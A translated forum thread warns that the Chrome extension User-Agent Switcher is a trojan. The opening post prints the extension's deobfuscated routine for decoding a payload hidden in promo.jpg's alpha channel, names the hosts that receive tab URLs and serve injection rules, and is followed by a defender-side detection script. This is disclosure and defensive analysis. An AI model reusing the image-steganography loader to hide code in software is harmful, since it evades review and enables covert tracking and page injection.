Heads up: the Chrome extension User-Agent Switcher is a trojan

  anoymoux · 2017-09-09 06:27:10 +08:00 · 34861 views
This topic was created 743 days ago; the information in it may have changed since.
Search the Chrome Web Store for User-Agent Switcher: the top result (450,000 users) is a trojan...

https://chrome.google.com/webstore/detail/user-agent-switcher-for-g/ffhkkpnppgnfaobgihpdblnhmmbodake

To get around Chrome's review process, the author hid the malicious code inside promo.jpg.

Line 80 of background.js decodes the malicious code out of that image and executes it:

```javascript
t.prototype.Vh = function(t, e) {
    // The image source defaults to the bundled promo.jpg; r.Wk loads it as an image object.
    if ("" === '../promo.jpg') return "";
    void 0 === t && (t = '../promo.jpg'), t.length && (t = r.Wk(t)), e = e || {};
    // Decoding parameters come from this.ET (or overrides in e):
    // i = bits carried per pixel, o = channel mode, h = bits per output character,
    // f = end-of-stream predicate.
    var n = this.ET,
        i = e.mp || n.mp,
        o = e.Tv || n.Tv,
        h = e.At || n.At,
        a = r.Yb(Math.pow(2, i)),
        f = (e.WC || n.WC, e.TY || n.TY),
        u = document.createElement("canvas"),
        p = u.getContext("2d");
    // Draw the image onto a hidden canvas so the raw pixel values can be read back.
    // (Note the original's quirk: the height is taken from e.width.)
    if (u.style.display = "none", u.width = e.width || t.width, u.height = e.width || t.height, 0 === u.width || 0 === u.height) return "";
    e.height && e.width ? p.drawImage(t, 0, 0, e.width, e.height) : p.drawImage(t, 0, 0);
    var c = p.getImageData(0, 0, u.width, u.height),
        d = c.data,
        g = [];
    if (c.data.every(function(t) {
            return 0 === t
        })) return "";
    var m, s;
    // Mode 1: walk the alpha channel (indices 3, 7, 11, ...) until f signals the end;
    // each pixel's alpha minus (256 - 2^i) yields i bits of payload.
    if (1 === o)
        for (m = 3, s = !1; !s && m < d.length && !s; m += 4) s = f(d, m, o), s || g.push(d[m] - (255 - a + 1));
    var v = "",
        w = 0,
        y = 0,
        l = Math.pow(2, h) - 1;
    // Pack the i-bit values LSB-first into h-bit characters to rebuild the hidden string.
    for (m = 0; m < g.length; m += 1) w += g[m] << y, y += i, y >= h && (v += String.fromCharCode(w & l), y %= h, w = g[m] >> i - y);
    // Anything shorter than 13 characters is treated as "no payload".
    return v.length < 13 ? "" : (0 !== w && (v += String.fromCharCode(w & l)), v)
}
```
It encrypts the URL and other details of every tab you open and sends them to https://uaswitcher.org/logic/page/data
It also fetches promotion-link rules from http://api.data-monitor.info/api/bhrule?sub=116 and, when you open a site matching those rules, injects ads or even malicious code into the page.
Based on the information on ThreatBook ( https://x.threatbook.cn/domain/api.data-monitor.info ), I suspect the following extensions are by the same author..

https://chrome.google.com/webstore/detail/nenhancer/ijanohecbcpdgnpiabdfehfjgcapepbm

https://chrome.google.com/webstore/detail/allow-copy/abidndjnodakeaicodfpgcnlkpppapah

https://chrome.google.com/webstore/detail/%D1%81%D0%BA%D0%B0%D1%87%D0%B0%D1%82%D1%8C-%D0%BC%D1%83%D0%B7%D1%8B%D0%BA%D1%83-%D0%B2%D0%BA%D0%BE%D0%BD%D1%82%D0%B0%D0%BA%D1%82%D0%B5/hanjiajgnonaobdlklncdjdmpbomlhoa

https://chrome.google.com/webstore/detail/aliexpress-radar/pfjibkklgpfcfdlhijfglamdnkjnpdeg

This is also being discussed here: https://news.ycombinator.com/item?id=14889619
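A defender-side check, added here as an example (it is not the extension's code nor the poster's deobfuscation): given RGBA pixel data of the kind canvas getImageData returns, it reads the alpha residues and packs bits the same way the snippet above does, then flags buffers whose leading pixel run decodes to printable text, which is what a scanner for an extension's bundled images would look for. Assumptions: 4 bits per pixel, 8-bit characters, the stream ends at the first pixel whose alpha falls below the encoding window, and the 13-character minimum mirrors the snippet's length check.

```python
import string

PRINTABLE = set(string.printable.encode())

def extract_alpha_residues(rgba, bits_per_pixel=4):
    # Alpha sits at index 3, 7, 11, ... of canvas ImageData; a payload pixel carries
    # its bits as alpha - (256 - 2**bits), the same offset the snippet uses.
    # Assumption: the hidden stream ends at the first pixel below that window.
    floor = 256 - (1 << bits_per_pixel)
    residues = []
    for m in range(3, len(rgba), 4):
        if rgba[m] < floor:
            break
        residues.append(rgba[m] - floor)
    return residues

def pack_bits(residues, bits_per_pixel=4, char_bits=8):
    # Same LSB-first packing as the snippet's loop over g[m].
    out, w, y, mask = bytearray(), 0, 0, (1 << char_bits) - 1
    for r in residues:
        w += r << y
        y += bits_per_pixel
        if y >= char_bits:
            out.append(w & mask)
            y %= char_bits
            w = r >> (bits_per_pixel - y)
    return bytes(out)

def looks_like_hidden_text(rgba, bits_per_pixel=4, char_bits=8, min_len=13):
    # Flag when the decoded leading run is long enough and almost all printable.
    # A fully opaque image decodes to a run of 0xFF bytes and is not flagged.
    decoded = pack_bits(extract_alpha_residues(rgba, bits_per_pixel),
                        bits_per_pixel, char_bits)
    if len(decoded) < min_len:
        return False, decoded
    ratio = sum(b in PRINTABLE for b in decoded) / len(decoded)
    return ratio >= 0.95, decoded

def build_rgba(alphas):
    # Constructed pixel buffer: fixed grey colour, caller-supplied alpha values.
    return b"".join(bytes([128, 128, 128, a]) for a in alphas)

# Constructed sample: alphas spelling "hidden payload" (low nibble then high nibble
# of each byte, each offset by 240), a transparent terminator, then opaque pixels.
HIDDEN_ALPHAS = [248, 246, 249, 246, 244, 246, 244, 246, 245, 246, 254, 246,
                 240, 242, 240, 247, 241, 246, 249, 247, 252, 246, 255, 246,
                 241, 246, 244, 246]
SUSPICIOUS_IMAGE = build_rgba(HIDDEN_ALPHAS + [0] + [255] * 32)
OPAQUE_IMAGE = build_rgba([255] * 64)
```

Running `looks_like_hidden_text` over both buffers flags only the constructed one; a real scanner would feed it the decoded pixels of each image shipped in the extension package.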

111 replies  |  last reply 2017-11-22 16:53:01 +08:00
#101 chanssl   2017-09-10 20:09:20 +08:00
Damn, it's actually malware. I got hit.
#102 Bailang   2017-09-10 21:15:38 +08:00
#103 chroming   2017-09-10 22:54:44 +08:00
Just noticed that someone already found this extension had problems last year: https://www.v2ex.com/t/263719
#104 Bailang   2017-09-11 09:52:04 +08:00
Reposted; will take down on request.

https://x.threatbook.cn/article?threatInfoID=113
Someone posted the extension's policy:

Collected Information.

Accessing and Using the Services.
When users access or use the Services, certain non-personally and personally identifiable information (the "User Information") is collected, stored and used for business and marketing purposes, such as maintaining and improving the Services, conducting research, and monetization. This User Information includes, without limitation: IP address, unique identifier number, operating system, browser information, URLs visited, data from URLs loaded and pages viewed, search queries entered, social connections, profile properties, contact details, usage data, and other behavioral, software and hardware information. If you access the Services from a mobile or other device, we may collect a unique device identifier assigned to that device or other information for that device in order to serve content to it. This collected data may also be supplemented with information obtained from third parties or submitted by users.
#105 nyanyh   2017-09-11 11:52:12 +08:00
@acess omg... I'm still using Better History, and sometimes in Surge I see random odd domains like dwoqpurpfdjksla.lan; I wonder whether that extension is behind it.
#106 xssnull   2017-09-12 14:09:03 +08:00
@anoymoux Great deobfuscation work, could you share how you did it?
#107 cyg07   2017-09-20 19:10:53 +08:00
@redsonic   @anoymoux @xssnull

360CERT's detailed analysis:

"Chrome extension User-Agent Switcher malicious code analysis report"

http://mp.weixin.qq.com/s/iqXL7VQxdX6T7UVwj5PBHw
#108 ariza   2017-09-22 10:23:32 +08:00
Why the hell is it still up..
#109 anoymoux   2017-09-22 10:45:46 +08:00
@ariza Embarrassing.. it has even gained another 50,000 users...
#110 lyragosa   2017-10-18 23:32:49 +08:00
It seems I had this very extension... it scared me into deleting it right away.
#111 iVeego   2017-11-22 16:53:01 +08:00
@anoymoux #109 More and more... 😅😅😅